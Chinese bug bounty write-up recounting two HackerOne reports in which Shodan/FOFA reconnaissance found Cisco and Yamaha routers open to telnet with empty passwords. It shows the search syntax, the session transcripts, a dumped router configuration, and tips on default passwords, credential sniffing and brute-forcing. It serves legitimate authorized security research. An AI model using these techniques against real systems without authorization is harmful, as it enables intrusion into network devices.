正文部分
https://hackerone.com/nanwn
漏洞总结
1. 善于使用fofa,shodam等搜索引擎,当对一个公司或者目标进行长时间的src挖掘的时候,需要时刻关心其上线的新资产(
RongScan也是有这个功能的),当一个新资产出现的时候即使对其进行测试,这时候的资产一般就是最薄弱的,最容易存在漏洞的,甚至可以捡漏
1. 善于使用fofa,shodam等搜索引擎,当对一个公司或者目标进行长时间的src挖掘的时候,需要时刻关心其上线的新资产(
2. 当常规web没有方法打入的时候,我们可以尝试对一些服务进行测试,例如telnet,mqtt,rsync等等,说不定可以有重大的突破,所以我们也要学习一些端口的利用方式
3. 注意路由器的一些默认密码等漏洞,例如本文的两个例子都是通过捡漏路由的空密码,从而实现7000多刀的牛逼战绩!
4. 善用fofa的特定语法,说不定在banner等位置就可以发现漏洞的存在!!
漏洞复现
案例一(2158刀)
在 Shodan、hunter.how 和其他网站上进行搜索时,我经常会定时查看新更新的资产,在运气好的时候可以利用这个习惯,捡到很多大的漏洞!!
在 Shodan 上:
org:"redacted inc" 或 ssl:redacted.com
我在屏幕上查找了 IP 地址结果,然后检查了结果的横幅输出。然后我发现了带有有趣端口 7500 的横幅输出"vty-authd#"
补充:原作者没有进行配图,我通过我的语法,在fofa上进行复现了,方便师傅们学习
通过我的搜索,这一般都是一个cisco的路由器的默认配置,其密码为空,同时其默认端口为7500
由于它是 Cisco 路由器,我尝试使用 Telnet 进行连接。
NAN:~/ $ telnet <redactedip>7500[14:41:32]
Trying redactedip...
Connected to redactedip.
Escape character is'^]'.
vty-authd# show ?
show
<carriage return>Completes command
<number> verbosity
vty-authd# show
vty-authd#
vty-authd# ?
send send message
setset authd debug settings
show show information about AUTHD
结果显示,我成功连接到路由器,无需身份验证。
我也通过fofa的站点进行了复现
- 1. window可以直接使用telnet进行连接
- 2. 不需要身份认证就可以连接成功
补充:存在身份认证的效果应该如下图
会让你进行密码输入,或者无法连接
- 3. 执行命令
这里我的cmd有点问题,导致乱序了,但是是可以正常执行的
我写了报告并收到了 Redacted Staff 的分类回复,他们对我的报告进行了评估和分类。
就在同一天,我收到了赏金。
案例二(5000刀)
同样定期查看新增的资产列表 :
org:"redacted inc" 或 ssl:redacted.com
结果中会显示许多 IP、端口和域。我看到 telnet 端口 23,但带有一个非常陌生的横幅。
横幅显示如下 “password:”
root@nan:~# telnet
Trying …
Connected to .
Escape character is ‘^]’.
Password:
当尝试使用telnet进行连接的时候,虽然发现可以进行连接,但是是需要输入密码的,但没有想到的是他使用了空密码,只需要进行回车就可以直接进行连接
Password:
RTX1100 Rev. (Mon Aug 28 13:00:42 2006)
Copyright © 1994–2006 Yamaha Corporation.
Copyright © 1991–1997 Regents of the University of California.
Copyright © 1995–2004 Jean-loup Gailly and Mark Adler.
Copyright © 1998–2000 Tokyo Institute of Technology.
Copyright © 2000 Japan Advanced Institute of Science and Technology, HOKURIKU.
Copyright © 2002 RSA Security Inc. All rights reserved.
Copyright © 1997–2004 University of Cambridge. All rights reserved.
Copyright © 1997–2002, Makoto Matsumoto and Takuji Nishimura, All rights reserved.
Copyright © 1995 Tatu Ylonen , Espoo, Finland All rights reserved.
Copyright © 1998–2004 The OpenSSL Project. All rights reserved.
Copyright ©__ 1995–1998 Eric Young ([email protected][1]) All rights reserved.Memory 32Mbytes, 3LAN, 1BRI
> show config
# RTX1100 Rev.(Mon Aug 28 13:00:42 2006)
# MAC Address : ,
# Memory 32Mbytes, 3LAN, 1BRI
# main: RTX1100 ver=e0 serial= MAC-Address= MAC-Addr
ess= MAC-Address=security class 2 on on
login timer 600
ip route default gateway pp 1
ip lan1 addresspp select 1
pp always-on off
pppoe use lan2
pppoe auto connect on
pppoe auto disconnect on
pp auth accept pap chap
pp auth myname *
ppp lcp mru on 1454
ppp ipcp ipaddress on
ppp ipcp msext on
ppp ccp type none
ip pp mtu 1454
pp enable 1
syslog debug off
tftp host 192.168.11.2
dhcp service server
dhcp scope 1 –/28 expire 0:08 maxexpire 0:08
dns server
访问了上面提到的路由器后,我立即向 Hackerone 上的私有程序报告了它。对于严重性,我应用了 critical,因为我设法访问了路由器并查看了里面的配置。
1 个月后,该计划没有更改严重性,而是立即为此报告授予 5000 美元的赏金,这相当于严重性,即最高赏金。
拓展思维
我基于原作者的案例进行的补充
1. 定期进行资产巡航(可以写个工具,在国内,并不只有web,还有app,小程序等等!!)
例如:用我自己写的一个工具(RongScan)进行的隐晦资产收集,准确来说这个产品都没有上线,甚至还没有进行改名,其名称还是test,但是已经被我测绘到了,这时候只要等其上线,就可以第一步进行测试!!
其内容一样都是测试
2. telnet如何进行测试
可以把telnet看成比ssh低级的一个协议,存在的漏洞有可能有:空密码,默认密码,没有鉴权等等,这时候连接后,正常尝试执行命令进行测试即可。当然说到telnet比ssh低级,是因为其安全性很低,其发送的数据包都是非加密的,这就导致如果管理员和你在同一个局域网内,就可以使用wireshark等工具获取到telnet的密码(当管理员连接的时候被抓取到数据包),以及其没有爆破频率的限制,会导致其容易被爆破等
总的来说,telnet存在的漏洞有(尤其需要注意路由器交换机等,存在的可能性会更大):
1. wifi telnet 管理员连接明文密码抓取,导致接管
2. 默认弱口令(可以看下面的案例)
3. 空密码
4. 没有进行鉴权,直接可以进行连接
5. 弱口令爆破等等...
如果可以获取到telnet的权限,正常执行命令,进行危害证明即可
3. 漏洞资产的测绘
例如:很多路由器并不只是存在空密码,没有密码等弱口令,善用搜索引擎,可能会有重大的突破!
利用特定的语法搜索路由器默认密码
利用默认密码进行连接,成功执行命令
知识星球
具体的星球介绍可以看一下这里~~
原文始发于微信公众号(fkalis):【海外SRC赏金挖掘】只利用信息收集,拿下5000+2158刀美金!!
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论